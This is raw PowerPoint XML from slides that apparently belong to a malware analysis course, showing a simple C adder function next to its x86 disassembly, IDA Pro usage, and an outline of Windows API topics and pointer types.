              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>004010xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>004010xx pop 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>004010xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>retn</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10775312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Recognizing C/C++ structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Function call</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827584" y="1959223"/>
            <a:ext cx="2962542" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>adder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> b)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>a+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>void main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> y = 2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>("the function returned the number %d\n", adder(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4788024" y="1817905"/>
            <a:ext cx="3615092" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401730 push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401731 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401733 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>arg_0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401736 add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>arg_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401739 pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040173A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>retn</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743946" y="3812884"/>
            <a:ext cx="4304448" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401085 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [ebp+var_4], 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040108C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [ebp+var_8], 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401093 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>00401096 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [esp+4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040109A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, [ebp+var_4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>0040109D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004010A0 call adder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004010A5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [esp+4], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004010A9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>], offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>TheFunctionRet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>004010B0 call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4009450" y="1774557"/>
            <a:ext cx="734496" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>adder</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089600" y="3812884"/>
            <a:ext cx="654346" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>ain</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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7527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5</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Examine C structures by IDA Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="762962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Analyzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Malwares of Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Handles, File System functions, Special files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows API &amp; Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows API &amp; Networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Bekerly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> socket, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WinINET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Existences of running malwares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>DLL, Thread, Process, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, Service, COM, Exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Kernel &amp; User mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22840153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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>broad set of functionality that governs the way </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>that malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>interacts with the Microsoft libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>Hungarian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>notation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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76" y="2708920"/>
            <a:ext cx="8164900" cy="4106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45383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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Long Pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>LP: win 32-bit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://qph.fs.quoracdn.net/main-qimg-8e76a1fd7c71319addb3ee0c7d81b48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060848"/>
            <a:ext cx="2962275" cy="1943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3568" y="2859525"/>
            <a:ext cx="3049834" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>LPINT *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>LPDWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>LPINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> *ptr1, ptr2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>LPINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>* ptr1, ptr2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>LPINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>) [50]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
